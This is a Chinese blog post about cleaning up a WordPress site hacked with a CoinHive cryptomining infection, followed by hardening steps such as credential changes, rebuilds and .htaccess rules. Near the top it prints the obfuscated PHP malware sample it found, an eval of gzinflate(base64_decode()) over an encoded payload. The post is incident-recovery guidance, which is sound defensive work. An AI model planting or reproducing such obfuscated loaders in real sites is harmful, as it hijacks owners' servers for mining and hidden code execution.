怎么恢复被黑的wordpress网站-挖矿脚本

12月 6, 2018 0条评论 1,298次阅读 0人点赞

《怎么恢复被黑的wordpress网站-挖矿脚本》

最近，朋友的WordPress网站不幸一直是被黑客攻击着者。更烦恼的是，该网站运行着公司的网站，投放这google广告。由于病毒导致广告下架，给公司带来不小损失。

黑客脚本

首先，关于黑客脚本。根据网站文件中的异常文件，我发现这些代码是CoinHive的加密挖掘恶意软件。搜索出来的和我发现的一样。网上介绍的这个脚本都是用于Drupal而不是WordPress。主要是关于JavaScript代码，但是这个hack是用PHP完成的，如下所示：

<?php

eval(“\n\$dgreusdi = intval(__LINE__) * 337;”);

$a = “7VdrT+NGFP1eqf9hiCIcKwHFj7ClIQh2Bd1V6bIthVZC1Jo4k2QSvzR2674raF/94zDk78GLOou5W6Uo2M7Zlzz33MnTs3JzzgTsySlsa674CIXjhROtQ95fX1zo/W+/IbhONgjMOSkqBqRbnffpvcPumbtIeBg4CfdZAQdMOuh43OdJK52Qf3KySaNIh674vqxWRAzvFg/WxqHApG3SlpNZ03l5c/vjsjNCZNNwznnDlhwAbH2UeyCvW1zF/rR4U5h9zwpyCfBnTChMODJU+otD+HhpIiOk8pmB8u4RNL674iZazpDG7MB2RswNR6y1ReodlZIsNvLavv674xyUtuJ3JuyWuIwMxzDI/r18dN5BaBm7rCfcnFHJ8ltFUNkWDJQgSkZHvj+vSnn2+M8OJs8vri+jR+e2YYV7+vTj9cee9vbk57b65XZxfXhvHDL97k9W/n7942Mm+qBsAZFoycOB6748mMSpc/hGSNYjtSY9AckfGbKsQYZqpxKrHF674uez5cXv36lDsByIaLROaOYDGjwp3Wh7mYQRm+XwSVROryKVNcyKd/L6eqltXmlsJxeZVzLI2+mr42/Xw6Z068GPo8jvHdakYsjDzWkQHxPDoMBU2YYuciXGMu/LVvDHFpNApxw9rCGT7o9kmTHyFBPLYh1/v1C7qWm6Vys41c3hayu6uiBLzdhtm83f505JrsPmGBdNiJqKA+7A/FKCO7bfI7HXmdDuVU3zZnd3olO9ThKI/s6743cqWmW95Xx4LKxYdcsVSZUbDuuIer9No1uNzjW48/BAdlqlvV6sPR2ijcZLymcRG9MZW0XjGT2cz674aTWcgmfDaK4nA0GzNN18lgQCoanq/up0LQj61cFZIPhrOkIhaveJIWhbwC8JeW0cXGIw3e+F6xGlQqqyitQm61aKndAXgSTaMl674+kOeA4er+Gasd/dMzQFkLnTUJ6mglOP/ykLghRUUao279onpvKJIRCFkIy0u5fQ5jKK3eNk3+ZvtRYUS1tzRBOKDTVnH2vPgJNFsPU1dgVjQaGY5CgKB1BFtUIW7w46745UG674N5miihTDFNajUsQ2sl8o4fuKzahSmje29sAtnxk8iBaJwrfhYjxmIiutm+Fk6G1Su7j+e0bnc+//AOGBWfq2OqSHsZ582iXCXg+DB7hf4f4O9y674674urg/oQQQ/DdLbNBggwPiHQJC8IHOkFiADdhgAG674AYgBjAGQAZQBmHJaYTAiZUgO674TAiZ674DJ79faYIDNBZoLMhFKrWzYNIAtkFsgskFkgsyBkQciCkAUhG0pt4GzgbOkLcDZwNnD2qxKhDS674bQj0I9b7aZPmf8Ksj1FV9Iipa2imSI5I1duuy2Cd6pecfpmhF74zSeJs2bals2sbdkZ2BVKrsAiVRjdQu6d6fn+vk6AgbvL5Lk5fsYpT0a674UVJ7T8ocGDBauSltwMFn6do5y0iVGJVdoZV7xpGy+IAv49kJYiFmvpfDRMZYM674YyveVlza2G6+1Hbzs2w3S7YffAHTrZeabr3Y9DrhJ8v/sc2rKfcY6GUiHZOu2gw33QPDJ2VdXDo5PsbpplL71JLsD9IfM67StC674iPSDlPZNZvbf3/GaSMR4QW93BZj+D1mZkDdbf”;
$a = str_replace($dgreusdi, “E”, $a);
eval (gzinflate(base64_decode($a)));

这是一个加密挖掘脚本。通过查看源代码来理解它最终目的并不容易，但是，这个脚本的整个想法是为了获得加密管理器的一些加密货币：加密矿工获得加密货币奖励成为第一个确保“信息的真实性和用交易更新区块链” – 这样你就可以很快理解为什么他们绕过黑客人民网站…他们就是为了挖矿赚钱！

漏洞在哪？

WordPress社区对这个脚本有讨论。根据排查，漏洞的位置指向Contact Form 7插件，因为其中一个加密挖掘脚本已上载到此插件的目录中。因此，在此期间，我将研究此插件以及可利用以将恶意软件上传到Web服务器的任何漏洞。

解决

毫无疑问，我需要恢复这个网站，在WordPress.org上有两篇很棒的文章，你可以阅读如何从一个被黑的WordPress网站恢复，以及如何强化你的WordPress网站，以减少再次被黑客攻击的机会。

步骤一：

安全扫描是恢复被黑网站最重要的部分，没有它，漏洞可能仍然存在，您的头痛可能会再次发生！

选择扫描软件时，您将需要服务器端的某些东西，以便它可以看到所有的网站文件。出于这个原因，我可以推荐Cerber Security，Sucuri Security或Wordfence Security，所有这些都是WordPress的插件，如果存在的话，可以帮助您发现现在和未来的漏洞。

如果他们提供安全扫描服务，我还建议您咨询您的网站托管服务提供商。我主持1和1，这是他们的自动安全扫描服务，首先提醒我网站黑客，并且至关重要的是，他们也自动中和它。

你的电脑可能被感染了！
不幸的是，这是真的。可能是您的计算机感染了同样的黑客，或者您的计算机首先遭到黑客入侵，这使得黑客可以访问您的网站（例如，嗅探FTP登录凭据或在键盘上查找密钥）。因此，您应立即在计算机上运行防病毒和防恶意软件扫描软件。我可以推荐这个和那个，它有免费的30天试用，所以你甚至不需要付钱。

在扫描完成之前不要做任何处理！
想象一下，如果黑客知道您何时通过FTP登录任何Web服务器，他们可以捕获您的用户名和密码！这就是为什么在扫描完成之前你没有前进的原因 – 在你发现感染之前，没有必要更改你的密码。

步骤二：处理病毒

杀毒扫描会发现类似如下的文件；

l9ql67eng.php
7ad7trr2ug.php
y04tqer3fu.php
co4er36bga.php

可以看出这些文件是随机生成的，不同的网站生成的文件名不相同。并且这些文件不是源头，在我们没有发现已经加密的CoinHive挖矿病毒之前，先删除网站文件和数据库中的这类病毒文件。

再次扫描网站，发现没有病毒了，但是病毒并没有清除，所以我们需要进行步骤三。

步骤三：更改用户名和密码

你需要更改网站后台，数据库，ftp账户的用户名和密码。

步骤四：设置网站维护模式

网站下线给用户代理不好的体验，所以我们就需要设置网站为维护模式。可以用插件过着搜索相关教程。

步骤五：重新做网站

保留原网站的备份，这样可以以后找出中毒的原因。

然后开始做新的网站，

1.官网下载新版本的worpdress程序；

2.新建空白数据库；

3.重新下载和原网站相同的主题和插件。

4.最重要的，对网站进行安全扫描。

注意：不要在运行的服务器上运行新网站。建议本地环境做新网站。

步骤六：强化wordpress

即使没有被病毒侵扰，你也应该采取必要的措施来加强我们wordpress网站的安全性，保证网站不再被黑或者从不被黑，一下是建议应该采取的安全措施；

1.安全扫描和警报：安装Cerber Security，Sucuri Security或Wordfence Security
2.清理：删除过时的主题和插件
3.限制访问：删除冗余用户帐户
4.更改用户名和密码：对于您决定保留的所有帐户
5.按时备份：使用UpdraftPlus将数据库和网站文件的备份至少每天安排到另一个位置（注，与您的网站所在的服务器不同）
6.手动更新所有内容：手动更新WordPress核心，所有主题和插件，然后检查您网站上的所有内容以确保它按预期工作，然后关闭WordPress核心的自动更新，并安排一天，每个月当您要登录WP Admin并检查更新
7.设置权限：设置WordPress文件夹和文件的建议权限（请参阅WordPress.org上的“核心目录/文件”）
8.wp-admin安全：在wpbeginner上按照“如何密码保护你的WordPress管理员（wp-admin）目录”保护带有密码保护的“wp-admin”文件夹 – 请务必遵循“更新：以下是如何修复管理员Ajax问题“也是如此
9.混淆wp-login：使用Cerber Security插件将登录页面URL从“wp-login.php”更改为其他一些随机名称
10.保护wp-includes：根据WordPress.org上的“WP-Includes”更新网站根目录中的.htaccess文件，保护“wp-includes”文件夹
11.保护上传：根据WordPress.org上的“WP-Content / Uploads”在“uploads”文件夹中创建.htaccess文件，保护“uploads”文件夹
12.保护wp-config：根据WordPress.org上的“WP-Config.php”更新网站根目录中的.htaccess文件，保护“wp-config.php”文件
13.禁用文件编辑：通过添加define（’DISALLOW_FILE_EDIT’，true）禁用WP Admin中的文件编辑;到“wp-config.php”

当然如果你有更好的建议，欢迎随时指教。

后续：如何用加强.htaccess文件加强wordpress网站安全。

一、限制Wp-Admin目录IP

如果你管理wordpress网站一般就只有那么几个IP，而且你对自己的网站安全十分看重，比如你运行一个关系重大的团队网站，同时常常受到黑客的光顾，而且团队运行的登陆者常常使用的几个固定IP，为了保证网站的安全，下面这个方法可以限制读取wp-admin目录的IP或者IP网段，不是指定的IP（或者IP网段）就无法访问后台，这个方法当然不仅仅针对wordpress网站。

用NotePad++新增一个.htaccess文件，在htaccess文件中添加下述代码，并将文件上传到“wp-admin”目录下。

其中的蓝色部分请换成你的IP，这段语法的判断流程简言之就是先封锁有所IP，然后开放允许的IP，所以将“allow from 12.34.56.78”的12.34.56.78改成你的IP。如果是一个网段，可以输入“ 12.34.56.”

AuthUserFile /dev/null

AuthGroupFile /dev/null

AuthName "Wordpress Admin Access Control"

AuthType Basic

<LIMIT GET>

order deny,allow

deny from all

allow from 12.34.56.78

</LIMIT>

二、限制存取Wp-Includes目录

“wp-includes”这个目录是系统的一些核心目录，还有”/wp-admin/wp-includes”和，”/wp-includes”在我们的网站页面上并没有哪个页面有URL会指向这些地方（通常这个目录里的文件只能被被管理者修改或者代码里调用的）。用以下这段语法可以限制存取的权限，请将下面的代码加入到根目录的.htaccess文件中。

此为官方建议设定。

# Block the include-only files.

RewriteEngine On

RewriteBase /

RewriteRule ^wp-admin/includes/ - [F,L]

RewriteRule !^wp-includes/ - [S=3]

RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]

RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]

RewriteRule ^wp-includes/theme-compat/ - [F,L]

# BEGIN WordPress

如果没有加入以上语法，会显示错误讯息；如果加了以上语法，会显示WordPress的默认404页面：告诉你目录不存在，这样是一个比较安全的防护措施。

三、限制Wp-Login.Php登入IP

如果你网站没有开放注册，那你可以执行这项的方法，限制允许访问wp-login.php只有网站的管理者，设定方法和前面的限制wp-admin存取IP方法类似，请将“12.34.56.78”改成你允许的IP或是网段。

<Files wp-login.php>

Order deny,allow

Deny from All

Allow from 12.34.56.78

</Files>

四、限制上传大小

避免黑客透过Dos攻击，利用传输大文件来冲爆你的流量，所以可以透过限制单档大小来阻绝这样的一个状况发生，将以下语法加入到根目录的.htaccess文件中即可，极客人的预设是10MB。

LimitRequestBody 10240000

五、保护Wp-Config.Php配置文件

用过WordPress都知道”wp-config.php”这个文件攸关整个系统的运行，少了它或者配置错误连不上数据库，因为这个文件内保存了MySQL的账号与密码，为了保护这个文件，WordPress官方有个建议，就是先将此文件权限设定为”400”，也就是只允许拥有人权读取。不过设400可能会让一些插件例如wp super cache要写入设定值时发生错误，所以请大家斟酌裁定。

不过保护wp-config.php重头戏是设定.htaccess目录，修改根目录的.htaccess目录，加入以下语法，这语法意思是：禁止所有人浏览(主机内的程序是可以正常读取的)。

此为官方建议的设置方法：

<files wp-config.php>

order allow,deny

deny from all

</files>

六、防垃圾留言攻击

以下这段语法是保护你的留言防止被机器人垃圾留言攻击，主要屏蔽没有referrer的请求，但极客人使用过后发现成效有限，建议再加装Akismet和quiz保护会更好。请将下述代码加入到根目录的.htaccess文件，其中的”wangbaiyuan.cn”请换成你自己的网站网址。

RewriteEngine On

RewriteCond %{REQUEST_METHOD} POST

RewriteCond %{REQUEST_URI} .wp-comments-post\.php*

RewriteCond %{HTTP_REFERER} !.*wangbaiyuan.cn.* [OR]

RewriteCond %{HTTP_USER_AGENT} ^$

RewriteRule (.*) ^http://%{REMOTE_ADDR}/$ [R=301,L]

七、禁止目录索引

如果你的虚拟主机没有开启禁止目录索引功能，请您务必加上此语法以保护没有index目录的目录，避免被恶意人士将网站内容全部下载。

Options –Indexes

八、变更数据表前缀

数据表前缀词其实在一开始安装的时候就务必做一个修正的动作，避免使用预设wp的名称，修改请务必小心，否则可能造成网站错误，做任何调整前务必先行备份。

九、合理设置目录权限

网站内该设定的权限务必根据需求调整好，例如wp-config.php就不建议设定为777。

十、账号安全

WordPress系统默认安装是采用admin账号，不过后来的版本允许使用者自行选择网站管理员账号，以避免恶意用户想要尝试admin登入网站。如果你本身已经使用admin，请赶快换账号吧！不然黑客轻易的就可以猜到你账号，接下来猜出密码应该很快了。另外建议使用Limit Login Attempts强化登入安全，当然您也要设一个不易猜出的密码。

十一、关闭后台主题编辑功能

WordPress后台的主题一旦权限开放就可以在后台直接编辑，如果没有开放则只可浏览。主机若有安装suPHP默认就是可以编辑。如果你觉得这项功能用不到，建议您可以关闭它，毕竟直接暴露在后台可以编辑是一件很危险的事情，除了可能因为黑客入侵乱改，也可能自己改错造成网站出错。请将以下语法加入倒wp-config.php适当位置，就可以关闭修改的权限了。

define('DISALLOW_FILE_EDIT', true);

十二、限制 .Htaccess 访问权限

当以上的东西调整完之后，别忘了强化你的.htaccess目录本身权限。将以下语法加入到.htaccess目录内已启用自我保护。语法是禁止所有人直接浏览该目录，但是系统使用读取是允许的。

<Files .htaccess>

order allow,deny

deny from all

</Files>

最后各位还是要做好个人的账号密码保护，另外也别在不明的网络、计算机乱登入网站，这都可能造成帐密外泄

黑客脚本

漏洞在哪？

解决

步骤一：

步骤二：处理病毒

步骤三：更改用户名和密码

步骤四：设置网站维护模式

步骤五：重新做网站

步骤六：强化wordpress

当然如果你有更好的建议，欢迎随时指教。

一、限制Wp-Admin目录IP

二、限制存取Wp-Includes目录

三、限制Wp-Login.Php登入IP

四、限制上传大小

五、保护Wp-Config.Php配置文件

七、禁止目录索引

八、变更数据表前缀

九、合理设置目录权限

十、账号安全

十一、关闭后台主题编辑功能

十二、限制 .Htaccess 访问权限

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可

本作品采用知识共享署名-相同方式共享 4.0 国际许可协议进行许可